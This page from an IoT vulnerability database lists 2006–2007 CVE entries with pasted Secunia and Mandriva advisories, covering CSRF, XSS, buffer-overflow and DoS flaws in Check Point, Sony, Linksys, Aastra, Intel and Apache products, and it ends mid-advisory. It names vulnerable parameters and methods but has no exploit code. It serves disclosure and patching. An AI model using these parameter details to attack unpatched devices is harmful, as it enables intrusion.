VARIoT IoT vulnerabilities database
 
    | VAR-200706-0391 | CVE-2007-3489 | Check Point VPN-1 Edge X Embedded type NGX Vulnerable to cross-site request forgery | CVSS V2: 9.3 CVSS V3: - Severity: HIGH | 
                            Cross-site request forgery (CSRF) vulnerability in pop/WizU.html in the management interface in Check Point VPN-1 Edge X Embedded NGX 7.0.33x on the Check Point VPN-1 UTM Edge allows remote attackers to perform privileged actions as administrators, as demonstrated by a request with the swuuser and swupass parameters, which adds an administrator account.  NOTE: the CSRF attack has no timing window because there is no logout capability in the management interface. Vpn-1 Utm Edge is prone to a cross-site request forgery vulnerability. A remote attacker can perform privileged operations as an administrator, for example, requesting swuuser and swupass parameters can increase the administrator account
                        
| VAR-200707-0307 | CVE-2006-7215 | Intel Core 2 Extreme Processor X6800 Vulnerability in | CVSS V2: 2.1 CVSS V3: - Severity: LOW | 
                            The Intel Core 2 Extreme processor X6800 and Core 2 Duo desktop processor E6000 and E4000 incorrectly set the memory page Access (A) bit for a page in certain circumstances involving proximity of the code segment limit to the end of a code page, which has unknown impact and attack vectors on certain operating systems other than OpenBSD, aka AI90. (A) There are vulnerabilities that are unspecified because they set the bits incorrectly.It may be affected unspecified. Intel Core 2 processors are prone to multiple local denial-of-service vulnerabilities. 
Attackers can exploit these issues to deny service to legitimate users. Intel CORE 2 is a very popular dual-core processor. Multiple denial of service vulnerabilities exist in CORE 2 processors: If the temperature reaches an invalid temperature, the CPU will not generate a Thermal interrupt even if the set threshold has been exceeded; during the execution of a series of REP store instructions, the store may be Attempts to allocate memory before completing the instruction, resulting in processor lockup and/or system hang; if one logical processor writes to a non-dirty page, another logical processor writes to the same non-dirty page or If the dirty bit is explicitly set in the page table entry of the core, the complex interaction of internal processor behavior can cause unpredictable system behavior and hang; if requesting data from Core 1 causes the L1 cache to be missed, the request will be sent to the L2 cache. If the request encounters a modified line in Core 2's L1 data cache, certain internal requests may cause incorrect data to be returned to Core 1. #PF code may be mishandled if: 1 PDE is modified without validating the relevant TLB entry 2 Code execution diverts to a different code page that satisfies both of the following conditions: * The target linear address is equal to the modified PDE * The PTE of the target linear address contains an explicit A (Accessed) bit 3 One of the following simultaneous exceptions occurs after code diversion: * #DB code and #PF code* Segmentation limit violation #GP code and #PF code software It can be seen that the #PF code is incorrectly processed before the segmentation fault destroys the #GP code, or the #PF code is processed instead of the #DB code
                        
| VAR-200706-0384 | CVE-2007-3482 | Apple Safari In " Same origin policy " Vulnerability to avoid | CVSS V2: 7.8 CVSS V3: - Severity: HIGH | 
                            Cross-domain vulnerability in Apple Safari for Windows 3.0.1 allows remote attackers to bypass the "same origin policy" and access restricted information from other domains via JavaScript that overwrites the document variable and statically sets the document.domain attribute. Apple Safari is prone to a vulnerability that permits an attacker to bypass the same-origin policy. 
A successful exploit may allow the attacker to access properties of the targeted domain or aid in spoofing content. This may allow the attacker to steal potentially sensitive information or launch other attacks. 
This issue affects Apple Safari 3.01; other versions may also be affected. JavaScript overrides document variables and statically sets the document.domain property
                        
| VAR-200706-0390 | CVE-2007-3488 | Sony Network Camera SNC-P5 SonySncP5View.OCX ActiveX Control Buffer Overflow Vulnerability | CVSS V2: 10.0 CVSS V3: - Severity: HIGH | 
                            Heap-based buffer overflow in the viewer ActiveX control in Sony Network Camera SNC-RZ25N before 1.30; SNC-P1 and SNC-P5 before 1.29; SNC-CS10 and SNC-CS11 before 1.06; SNC-DF40N and SNC-DF70N before 1.18; SNC-RZ50N and SNC-CS50N before 2.22; SNC-DF85N, SNC-DF80N, and SNC-DF50N before 1.12; and SNC-RX570N/W, SNC-RX570N/B, SNC-RX550N/W, SNC-RX550N/B, SNC-RX530N/W, and SNC-RX530N/B 3.00 and 2.x before 2.31; allows remote attackers to execute arbitrary code via a long first argument to the PrmSetNetworkParam method. The ActiveX Control for Sony SNC series network cameras is a software to monitor images over the network using a web browser. Failed exploit attempts likely result in denial-of-service conditions. ----------------------------------------------------------------------
Did you know? Our assessment and impact rating along with detailed
information such as exploit code availability, or if an updated patch
is released by the vendor, is not part of this mailing-list?
        
Click here to learn more about our commercial solutions:
http://secunia.com/advisories/business_solutions/
        
Click here to trial our solutions:
http://secunia.com/advisories/try_vi/
----------------------------------------------------------------------
TITLE:
Sony Network Camera ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID:
SA33968
VERIFY ADVISORY:
http://secunia.com/advisories/33968/
DESCRIPTION:
A vulnerability has been reported in the Sony Network Camera ActiveX
control, which can be exploited by malicious people to compromise a
user's system. 
The vulnerability is caused due to an unspecified error and can be
exploited to cause a buffer overflow. 
Successful exploitation may allow execution of arbitrary code. 
Please see vendor advisory for a list of products and firmware
versions that include the affected ActiveX control. 
SOLUTION:
Update to a fixed version. See vendor advisory for more details. 
PROVIDED AND/OR DISCOVERED BY:
Reported by the vendor. 
ORIGINAL ADVISORY:
Sony:
http://www.sony.jp/professional/News/info/pb20090223.html
OTHER REFERENCES:
JVN:
http://jvn.jp/jp/JVN16767117/index.html
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities. 
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link. 
Secunia NEVER sends attached files with advisories. 
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. 
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
                        
| VAR-200707-0349 | CVE-2007-3574 | Cisco Linksys WAG54GS Wireless-G ADSL Gateway Vulnerable to cross-site scripting | CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM | 
                            Multiple cross-site scripting (XSS) vulnerabilities in setup.cgi on the Cisco Linksys WAG54GS Wireless-G ADSL Gateway with 1.00.06 firmware allow remote attackers to inject arbitrary web script or HTML via the (1) c4_trap_ip_, (2) devname, (3) snmp_getcomm, or (4) snmp_setcomm parameter. (1) c4_trap_ip_ Parameters (2) devname Parameters (3) snmp_getcomm Parameters (4) snmp_setcomm Parameters. 
Attackers may exploit this issue by enticing victims into opening a malicious URI. 
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials, cause denial-of-service conditions, and launch other attacks. 
Successful exploits will allow script code to be stored persistently in the affected device. 
Linksys Wireless-G ADSL Gateway WAG54GS running firmware V1.00.06 is reported vulnerable. Linksys WAG54GS is a wireless ADSL router launched by Cisco. Linksys WAG54GS has an input validation vulnerability when processing user requests. If an attacker visits the router's configuration page and submits a malicious HTTP request, a cross-site scripting attack can be performed. 
----------------------------------------------------------------------
2003: 2,700 advisories published
2004: 3,100 advisories published
2005: 4,600 advisories published
2006: 5,300 advisories published
How do you know which Secunia advisories are important to you?
The Secunia Vulnerability Intelligence Solutions allows you to filter
and structure all the information you need, so you can address issues
effectively. 
Get a free trial of the Secunia Vulnerability Intelligence Solutions:
http://corporate.secunia.com/how_to_buy/38/vi/?ref=secadv
----------------------------------------------------------------------
TITLE:
Linksys WAG54GS Cross-Site Scripting and Cross-Site Request Forgery
Vulnerabilities
SECUNIA ADVISORY ID:
SA27738
VERIFY ADVISORY:
http://secunia.com/advisories/27738/
CRITICAL:
Less critical
IMPACT:
Cross Site Scripting
WHERE:
>From remote
OPERATING SYSTEM:
Linksys WAG54GS Wireless-G ADSL Gateway with SpeedBooster 1.x
http://secunia.com/product/16625/
DESCRIPTION:
Adrian Pastor has reported some vulnerabilities in Linksys WAG54GS,
which can be exploited by malicious people to conduct cross-site
scripting and cross-site request forgery attacks. 
1) Input passed to the "devname", "snmp_getcomm", "snmp_setcomm", and
"c4_trap_ip_" parameters in setup.cgi is not properly sanitised before
being returned to the user. 
2) The application allows users to perform certain actions via HTTP
requests without performing any validity checks to verify the
request. This can be exploited to e.g. perform certain administrative
actions by enticing a logged-in administrator to visit a malicious
site. 
The vulnerabilities are reported in firmware version 1.00.06. Other
versions may also be affected. 
SOLUTION:
Vulnerability #1 has reportedly been fixed in firmware version
1.01.03. 
Do not browse untrusted websites or follow untrusted links while
logged on to the device. 
PROVIDED AND/OR DISCOVERED BY:
Adrian Pastor
ORIGINAL ADVISORY:
http://www.gnucitizen.org/blog/persistent-xss-and-csrf-on-wireless-g-adsl-gateway-with-speedbooster-wag54gs
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities. 
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link. 
Secunia NEVER sends attached files with advisories. 
Secunia does not advise people to install third party patches, only
use those supplied by the vendor. 
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
                        
| VAR-200706-0512 | CVE-2007-3441 | Aastra 9112i SIP Phone Service disruption in (DoS) Vulnerabilities | CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM | 
                            Format string vulnerability in the Aastra 9112i SIP Phone with firmware 1.4.0.1048 and boot version 1.1.0.10 allows remote attackers to cause a denial of service (blocked call reception and slow calling) via format string specifiers in an SDP header value, a different vulnerability than CVE-2007-3349. Aastra 9112i SIP Phone There is a service disruption ( Call rejection and delayed call ) There is a vulnerability that becomes a condition
                        
| VAR-200706-0666 | CVE-2006-5752 | Apache HTTP Server of mod_status Module cross-site scripting vulnerability | CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM | 
                            Cross-site scripting (XSS) vulnerability in mod_status.c in the mod_status module in Apache HTTP Server (httpd), when ExtendedStatus is enabled and a public server-status page is used, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving charsets with browsers that perform "charset detection" when the content-type is not specified. When Hitachi Web Server receives a request that contains malicious scripts, they are inserted into the server-satus page the Server automatically creates. This allows the inserted malicious scripts to be executed on the client machines. The vulnerability does not affect the product if the server-status reporting feature is disabled.An attacker could execute malicious scripts. 
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.  This could lead to a denial of service
 if using a threaded MPM (CVE-2007-1863).  A local attacker with the
 ability to run scripts on the server could manipulate the scoreboard
 and cause arbitrary processes to be terminated (CVE-2007-3304). 
 
 Updated packages have been patched to prevent the above issues. 
 _______________________________________________________________________
 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5752
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1863
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3304
 _______________________________________________________________________
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 5f906bba3e1195f5ffbc3fcb2a6bde38  2007.0/i586/apache-base-2.2.3-1.1mdv2007.0.i586.rpm
 83a4844cd98ef203958796ce280a71b2  2007.0/i586/apache-devel-2.2.3-1.1mdv2007.0.i586.rpm
 2a6853cad61ca0548715486c5d4c8a23  2007.0/i586/apache-htcacheclean-2.2.3-1.1mdv2007.0.i586.rpm
 bebbc850c030be2ef87ce12d420fb825  2007.0/i586/apache-mod_authn_dbd-2.2.3-1.1mdv2007.0.i586.rpm
 9e08e4738b304aab4f90f4f18aa5da45  2007.0/i586/apache-mod_cache-2.2.3-1.1mdv2007.0.i586.rpm
 989d0538f7882277053f6d4c89ca581c  2007.0/i586/apache-mod_dav-2.2.3-1.1mdv2007.0.i586.rpm
 c1c0fc53dd811dd6176800226574efbf  2007.0/i586/apache-mod_dbd-2.2.3-1.1mdv2007.0.i586.rpm
 e68509c01d66b9d42e676e7974360154  2007.0/i586/apache-mod_deflate-2.2.3-1.1mdv2007.0.i586.rpm
 5596cb5359b7919125fc10be83598445  2007.0/i586/apache-mod_disk_cache-2.2.3-1.1mdv2007.0.i586.rpm
 d71b54240667224fd7da7fec4693c30b  2007.0/i586/apache-mod_file_cache-2.2.3-1.1mdv2007.0.i586.rpm
 3571cab041e622f9399c57f377ac3fe3  2007.0/i586/apache-mod_ldap-2.2.3-1.1mdv2007.0.i586.rpm
 598fdd7aad80fdc557142c5e9fc00677  2007.0/i586/apache-mod_mem_cache-2.2.3-1.1mdv2007.0.i586.rpm
 f4ec774478f5d198ad2e3d3384a5ad83  2007.0/i586/apache-mod_proxy-2.2.3-1.1mdv2007.0.i586.rpm
 ab7726290be59f03a5ade2029a2b02f8  2007.0/i586/apache-mod_proxy_ajp-2.2.3-1.1mdv2007.0.i586.rpm
 d72ab4173d51da4a0c1df63dbb52ccf5  2007.0/i586/apache-mod_ssl-2.2.3-1.1mdv2007.0.i586.rpm
 fcde0ec8b64d83402b53f926ec7fa835  2007.0/i586/apache-mod_userdir-2.2.3-1.1mdv2007.0.i586.rpm
 58a0628d42d23c9aa5df6567789fad40  2007.0/i586/apache-modules-2.2.3-1.1mdv2007.0.i586.rpm
 011487e1afdfb400419303182e5320c7  2007.0/i586/apache-mpm-prefork-2.2.3-1.1mdv2007.0.i586.rpm
 7a755b22020153b44f8d00ba153d3d97  2007.0/i586/apache-mpm-worker-2.2.3-1.1mdv2007.0.i586.rpm
 ef6e11f0d26db492bc9fe83a2dbf53d7  2007.0/i586/apache-source-2.2.3-1.1mdv2007.0.i586.rpm 
 411b90e42ed304f329e9989d64a9dfc5  2007.0/SRPMS/apache-2.2.3-1.1mdv2007.0.src.rpm
 Mandriva Linux 2007.0/X86_64:
 7c5408879073413fb27f2d40854813d0  2007.0/x86_64/apache-base-2.2.3-1.1mdv2007.0.x86_64.rpm
 c720f2a661616b0bf35bc353d14b9b3b  2007.0/x86_64/apache-devel-2.2.3-1.1mdv2007.0.x86_64.rpm
 12164d6d70972cb9ed2fb6581e212bf1  2007.0/x86_64/apache-htcacheclean-2.2.3-1.1mdv2007.0.x86_64.rpm
 5278f8d03ce9d59ec4929d4362b04bbe  2007.0/x86_64/apache-mod_authn_dbd-2.2.3-1.1mdv2007.0.x86_64.rpm
 40c83185db12d04f4953a374b329ebb3  2007.0/x86_64/apache-mod_cache-2.2.3-1.1mdv2007.0.x86_64.rpm
 fe37fb1d4378c4bbcfd8d63bd57c3d4d  2007.0/x86_64/apache-mod_dav-2.2.3-1.1mdv2007.0.x86_64.rpm
 0830bc5d1718a533e3358a45975596ce  2007.0/x86_64/apache-mod_dbd-2.2.3-1.1mdv2007.0.x86_64.rpm
 e18c3a6a322258e73b87170766aa7882  2007.0/x86_64/apache-mod_deflate-2.2.3-1.1mdv2007.0.x86_64.rpm
 fc8c27067e6b04bd549fe0b95579ebaa  2007.0/x86_64/apache-mod_disk_cache-2.2.3-1.1mdv2007.0.x86_64.rpm
 b31385db2199fd33eeb624c80e9d882a  2007.0/x86_64/apache-mod_file_cache-2.2.3-1.1mdv2007.0.x86_64.rpm
 08123786649152eab65e123c75db8e66  2007.0/x86_64/apache-mod_ldap-2.2.3-1.1mdv2007.0.x86_64.rpm
 7de4b739d93683648209dcdc69dd5473  2007.0/x86_64/apache-mod_mem_cache-2.2.3-1.1mdv2007.0.x86_64.rpm
 85fde2923d945f3849d77f806b8bc55d  2007.0/x86_64/apache-mod_proxy-2.2.3-1.1mdv2007.0.x86_64.rpm
 b68991944f2989b6d3f89f7272239d76  2007.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.1mdv2007.0.x86_64.rpm
 19871683773211daa721957dc5dd565d  2007.0/x86_64/apache-mod_ssl-2.2.3-1.1mdv2007.0.x86_64.rpm
 5cf2a97219d6789e4572da1ecddedf16  2007.0/x86_64/apache-mod_userdir-2.2.3-1.1mdv2007.0.x86_64.rpm
 feede872aaf0ca4bbd86ffe24455e9cd  2007.0/x86_64/apache-modules-2.2.3-1.1mdv2007.0.x86_64.rpm
 a00a35d4eba8f538cea741b2fc4079f4  2007.0/x86_64/apache-mpm-prefork-2.2.3-1.1mdv2007.0.x86_64.rpm
 da86251e4417f068d2cafed30e380779  2007.0/x86_64/apache-mpm-worker-2.2.3-1.1mdv2007.0.x86_64.rpm
 ceb7fd32d3ad933ab6a914085f858911  2007.0/x86_64/apache-source-2.2.3-1.1mdv2007.0.x86_64.rpm 
 411b90e42ed304f329e9989d64a9dfc5  2007.0/SRPMS/apache-2.2.3-1.1mdv2007.0.src.rpm
 Mandriva Linux 2007.1:
 9daef91724ded29a3c76e74c261f7766  2007.1/i586/apache-base-2.2.4-6.2mdv2007.1.i586.rpm
 9288ee938a0853d6e0072f839c68c1c2  2007.1/i586/apache-devel-2.2.4-6.2mdv2007.1.i586.rpm
 613a986f9f654f1ce3432ee6f6db2391  2007.1/i586/apache-htcacheclean-2.2.4-6.2mdv2007.1.i586.rpm
 8e0eb376d851d1ddba8850d4233fc3d3  2007.1/i586/apache-mod_authn_dbd-2.2.4-6.2mdv2007.1.i586.rpm
 24de68668efa15e4abaaffd690837256  2007.1/i586/apache-mod_cache-2.2.4-6.2mdv2007.1.i586.rpm
 288866908d43959c4b31c368346ba65d  2007.1/i586/apache-mod_dav-2.2.4-6.2mdv2007.1.i586.rpm
 d25838ec739d7a0037148f573262f81c  2007.1/i586/apache-mod_dbd-2.2.4-6.2mdv2007.1.i586.rpm
 ebad14bcccb73c8f8a27e98a6982a6f1  2007.1/i586/apache-mod_deflate-2.2.4-6.2mdv2007.1.i586.rpm
 810d445f2146848b582e798e368b32ab  2007.1/i586/apache-mod_disk_cache-2.2.4-6.2mdv2007.1.i586.rpm
 307de93279683b5b3e76ee6d971781cc  2007.1/i586/apache-mod_file_cache-2.2.4-6.2mdv2007.1.i586.rpm
 f59890e1bc38cfa598a4100705cf4cc6  2007.1/i586/apache-mod_ldap-2.2.4-6.2mdv2007.1.i586.rpm
 098a05d1cbaa6bfa2d2707896dd6366c  2007.1/i586/apache-mod_mem_cache-2.2.4-6.2mdv2007.1.i586.rpm
 6504f5e57440ff07da16de3d928898f6  2007.1/i586/apache-mod_proxy-2.2.4-6.2mdv2007.1.i586.rpm
 adc3a611a780e23178e93a6cedf135d4  2007.1/i586/apache-mod_proxy_ajp-2.2.4-6.2mdv2007.1.i586.rpm
 659508a67fbe28b5dd9f861384ca1cf1  2007.1/i586/apache-mod_ssl-2.2.4-6.2mdv2007.1.i586.rpm
 604eb70716d7e7b6bc6e8399cc4d9f5c  2007.1/i586/apache-mod_userdir-2.2.4-6.2mdv2007.1.i586.rpm
 750d7cb431356abc88fe7a031f872b04  2007.1/i586/apache-modules-2.2.4-6.2mdv2007.1.i586.rpm
 210be718db221db891452f05a001ee4e  2007.1/i586/apache-mpm-event-2.2.4-6.2mdv2007.1.i586.rpm
 482e3d3af6756108c3e9a26ec2a8ac56  2007.1/i586/apache-mpm-itk-2.2.4-6.2mdv2007.1.i586.rpm
 b76ff4578c127ebd248b21a85a31140a  2007.1/i586/apache-mpm-prefork-2.2.4-6.2mdv2007.1.i586.rpm
 2484dee8a4d4e7604a69abcd1b443954  2007.1/i586/apache-mpm-worker-2.2.4-6.2mdv2007.1.i586.rpm
 9823f9b97e1829df97999494c3a3d453  2007.1/i586/apache-source-2.2.4-6.2mdv2007.1.i586.rpm 
 ccbd9fad2b29ff86d8601f7201f48d72  2007.1/SRPMS/apache-2.2.4-6.2mdv2007.1.src.rpm
 Mandriva Linux 2007.1/X86_64:
 4d043339268bff11fa07897ee3dc2988  2007.1/x86_64/apache-base-2.2.4-6.2mdv2007.1.x86_64.rpm
 afbae73f408fa95c9e4d25e3aa39583d  2007.1/x86_64/apache-devel-2.2.4-6.2mdv2007.1.x86_64.rpm
 d92c22ff28fcd919b3a8525f753066c3  2007.1/x86_64/apache-htcacheclean-2.2.4-6.2mdv2007.1.x86_64.rpm
 abe81d2effd6f4975accbdc8d25d089e  2007.1/x86_64/apache-mod_authn_dbd-2.2.4-6.2mdv2007.1.x86_64.rpm
 480d5c31af3289f26953a691f92e2a51  2007.1/x86_64/apache-mod_cache-2.2.4-6.2mdv2007.1.x86_64.rpm
 3feae93ade4038e67fcbaa691f2a74aa  2007.1/x86_64/apache-mod_dav-2.2.4-6.2mdv2007.1.x86_64.rpm
 b60eead7fe808fbc5eff6cb34f1de80b  2007.1/x86_64/apache-mod_dbd-2.2.4-6.2mdv2007.1.x86_64.rpm
 023afee3221da629fd8e1d34006b7463  2007.1/x86_64/apache-mod_deflate-2.2.4-6.2mdv2007.1.x86_64.rpm
 1180446c8cf65c196352006d6da00e17  2007.1/x86_64/apache-mod_disk_cache-2.2.4-6.2mdv2007.1.x86_64.rpm
 0e8c2dfc0e42c23b0afbada9f8868bb6  2007.1/x86_64/apache-mod_file_cache-2.2.4-6.2mdv2007.1.x86_64.rpm
 32aa45f45b8893d6c23c6892b7ad7e62  2007.1/x86_64/apache-mod_ldap-2.2.4-6.2mdv2007.1.x86_64.rpm
 15c20ffb5fdc8ab2a6fa92157c9f0536  2007.1/x86_64/apache-mod_mem_cache-2.2.4-6.2mdv2007.1.x86_64.rpm
 f91fd6552f480eb36d030bb2e91d30b4  2007.1/x86_64/apache-mod_proxy-2.2.4-6.2mdv2007.1.x86_64.rpm
 2c9d1e35af7adebaeb6284bf5da4dd5f  2007.1/x86_64/apache-mod_proxy_ajp-2.2.4-6.2mdv2007.1.x86_64.rpm
 caa59aaba47c89d20e799a3f02271afd  2007.1/x86_64/apache-mod_ssl-2.2.4-6.2mdv2007.1.x86_64.rpm
 8ac44f8c409ea29492a3acdc1eb44c7f  2007.1/x86_64/apache-mod_userdir-2.2.4-6.2mdv2007.1.x86_64.rpm
 0f2198ec988390ff3b7843a1e7090517  2007.1/x86_64/apache-modules-2.2.4-6.2mdv2007.1.x86_64.rpm
 2548664fde736f25acf59f46c847d1ff  2007.1/x86_64/apache-mpm-event-2.2.4-6.2mdv2007.1.x86_64.rpm
 2434c402bae11969ddf5281f2f042d24  2007.1/x86_64/apache-mpm-itk-2.2.4-6.2mdv2007.1.x86_64.rpm
 8a06ecd19726db033496a042c6a6be2f  2007.1/x86_64/apache-mpm-prefork-2.2.4-6.2mdv2007.1.x86_64.rpm
 e8d339c397409391f3fb36f704c38c6c  2007.1/x86_64/apache-mpm-worker-2.2.4-6.2mdv2007.1.x86_64.rpm
 8a6f923428242f7aa1b4d489739e241b  2007.1/x86_64/apache-source-2.2.4-6.2mdv2007.1.x86_64.rpm 
 ccbd9fad2b29ff86d8601f7201f48d72  2007.1/SRPMS/apache-2.2.4-6.2mdv2007.1.src.rpm
 Corporate 4.0:
 74beb8d1579ce5d5f12c8b15981b6e63  corporate/4.0/i586/apache-base-2.2.3-1.1.20060mlcs4.i586.rpm
 326a8259b0d99bc2938bfa6cd85743e7  corporate/4.0/i586/apache-devel-2.2.3-1.1.20060mlcs4.i586.rpm
 ca305d0928255a65814af781b345a056  corporate/4.0/i586/apache-htcacheclean-2.2.3-1.1.20060mlcs4.i586.rpm
 48c2b6a5ee11c3f011b1f6dc60a86479  corporate/4.0/i586/apache-mod_authn_dbd-2.2.3-1.1.20060mlcs4.i586.rpm
 b81a3077cb88a34af43a61ad6f2559ea  corporate/4.0/i586/apache-mod_cache-2.2.3-1.1.20060mlcs4.i586.rpm
 ba5aee0b2a86182560e54f0cf4d360bd  corporate/4.0/i586/apache-mod_dav-2.2.3-1.1.20060mlcs4.i586.rpm
 b696352106c5a0d1697385523455c767  corporate/4.0/i586/apache-mod_dbd-2.2.3-1.1.20060mlcs4.i586.rpm
 e79f271f000dd7f3a009cca70fd7e4a2  corporate/4.0/i586/apache-mod_deflate-2.2.3-1.1.20060mlcs4.i586.rpm
 c7bdb987f61099b64e751639ca02dd8a  corporate/4.0/i586/apache-mod_disk_cache-2.2.3-1.1.20060mlcs4.i586.rpm
 b0303fcc2f43bdcf25419dde56df2297  corporate/4.0/i586/apache-mod_file_cache-2.2.3-1.1.20060mlcs4.i586.rpm
 f818ff0f890abe230c92069f9d256e5c  corporate/4.0/i586/apache-mod_ldap-2.2.3-1.1.20060mlcs4.i586.rpm
 4247be23e42c368b3880c7ab5ac13c89  corporate/4.0/i586/apache-mod_mem_cache-2.2.3-1.1.20060mlcs4.i586.rpm
 e50f1749935c96d3364bdce9af5d22bf  corporate/4.0/i586/apache-mod_proxy-2.2.3-1.1.20060mlcs4.i586.rpm
 a619b4e0130d1db7f77a790fee0917a6  corporate/4.0/i586/apache-mod_proxy_ajp-2.2.3-1.1.20060mlcs4.i586.rpm
 8170e0e77256f08d07b02119400a19f9  corporate/4.0/i586/apache-mod_ssl-2.2.3-1.1.20060mlcs4.i586.rpm
 4a5d94d4f94295efe48266a1d529486e  corporate/4.0/i586/apache-mod_userdir-2.2.3-1.1.20060mlcs4.i586.rpm
 7c0c27197d6b44115366eac339c424f2  corporate/4.0/i586/apache-modules-2.2.3-1.1.20060mlcs4.i586.rpm
 56351aafc723fdea2f2fac22d5046944  corporate/4.0/i586/apache-mpm-prefork-2.2.3-1.1.20060mlcs4.i586.rpm
 ccbb2f27b762b5dd564dc7a00aac6db0  corporate/4.0/i586/apache-mpm-worker-2.2.3-1.1.20060mlcs4.i586.rpm
 a65137ff29ed6a1da1f894d19997faec  corporate/4.0/i586/apache-source-2.2.3-1.1.20060mlcs4.i586.rpm 
 8cdf592a822485abba00dfb6591615ea  corporate/4.0/SRPMS/apache-2.2.3-1.1.20060mlcs4.src.rpm
 Corporate 4.0/X86_64:
 7a9b4f5b3fcf2cac67e4c38022ee2441  corporate/4.0/x86_64/apache-base-2.2.3-1.1.20060mlcs4.x86_64.rpm
 5604ba341d957fbe6182bd2eb29a8e9d  corporate/4.0/x86_64/apache-devel-2.2.3-1.1.20060mlcs4.x86_64.rpm
 8983bda4bbe3b58f9c6c317531eb52b7  corporate/4.0/x86_64/apache-htcacheclean-2.2.3-1.1.20060mlcs4.x86_64.rpm
 9baf252cbc8ef8a093ed25e7a0daf25d  corporate/4.0/x86_64/apache-mod_authn_dbd-2.2.3-1.1.20060mlcs4.x86_64.rpm
 26cc58bcbfd25a83c15051c8f590a36d  corporate/4.0/x86_64/apache-mod_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm
 941a32aea1b1b3bca1ae343d5d925892  corporate/4.0/x86_64/apache-mod_dav-2.2.3-1.1.20060mlcs4.x86_64.rpm
 1d79a7b921ce150de88e22ffbaba4b31  corporate/4.0/x86_64/apache-mod_dbd-2.2.3-1.1.20060mlcs4.x86_64.rpm
 d80b9ffca3dd024e73d069e55ba7fa3e  corporate/4.0/x86_64/apache-mod_deflate-2.2.3-1.1.20060mlcs4.x86_64.rpm
 7a7a11645680a7bee9cf88b166b0d32f  corporate/4.0/x86_64/apache-mod_disk_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm
 fcc85c0f9faf1fa08a01f3d4ecb68033  corporate/4.0/x86_64/apache-mod_file_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm
 55789d16ff565bcd31dfa522435d4d4b  corporate/4.0/x86_64/apache-mod_ldap-2.2.3-1.1.20060mlcs4.x86_64.rpm
 7ee708824d65878b71ede35e139ac94d  corporate/4.0/x86_64/apache-mod_mem_cache-2.2.3-1.1.20060mlcs4.x86_64.rpm
 e8579835f848cade641da14354196497  corporate/4.0/x86_64/apache-mod_proxy-2.2.3-1.1.20060mlcs4.x86_64.rpm
 6a1e70a638aecf603f3bc2485d14bd78  corporate/4.0/x86_64/apache-mod_proxy_ajp-2.2.3-1.1.20060mlcs4.x86_64.rpm
 212f40574d0821b909972ebc36fb697a  corporate/4.0/x86_64/apache-mod_ssl-2.2.3-1.1.20060mlcs4.x86_64.rpm
 32a8dd886e42c8093be05c9ee4d31855  corporate/4.0/x86_64/apache-mod_userdir-2.2.3-1.1.20060mlcs4.x86_64.rpm
 265bccd86baa7fca942f1c6d4d694523  corporate/4.0/x86_64/apache-modules-2.2.3-1.1.20060mlcs4.x86_64.rpm
 babdb585a6c754f23d91c41fc844a5e2  corporate/4.0/x86_64/apache-mpm-prefork-2.2.3-1.1.20060mlcs4.x86_64.rpm
 63274f5c5dc3897d0062f621b1c63e0e  corporate/4.0/x86_64/apache-mpm-worker-2.2.3-1.1.20060mlcs4.x86_64.rpm
 18782a1fcbcb760d36162ce830ac4cdd  corporate/4.0/x86_64/apache-source-2.2.3-1.1.20060mlcs4.x86_64.rpm 
 8cdf592a822485abba00dfb6591615ea  corporate/4.0/SRPMS/apache-2.2.3-1.1.20060mlcs4.src.rpm
 _______________________________________________________________________
 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you. 
 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:
  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
 You can view other update advisories for Mandriva Linux at:
  http://www.mandriva.com/security/advisories
 If you want to report vulnerabilities, please contact
  security_(at)_mandriva.com
 _______________________________________________________________________
 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (GNU/Linux)
iD8DBQFGjD3WmqjQ0CJFipgRAtGoAKCXMGCKCMbkso0ugvF0TpsWNwkPjgCfVakS
Re00IyLecNs4MIGgsrv2qJE=
=5EEm
-----END PGP SIGNATURE-----
. 
Affected packages
=================
    -------------------------------------------------------------------
     Package             /  Vulnerable  /                   Unaffected
    -------------------------------------------------------------------
  1  www-servers/apache       < 2.2.6                    *>= 2.0.59-r5
                                                              >= 2.2.6
Description
===========
Multiple cross-site scripting vulnerabilities have been discovered in
mod_status and mod_autoindex (CVE-2006-5752, CVE-2007-4465). An error
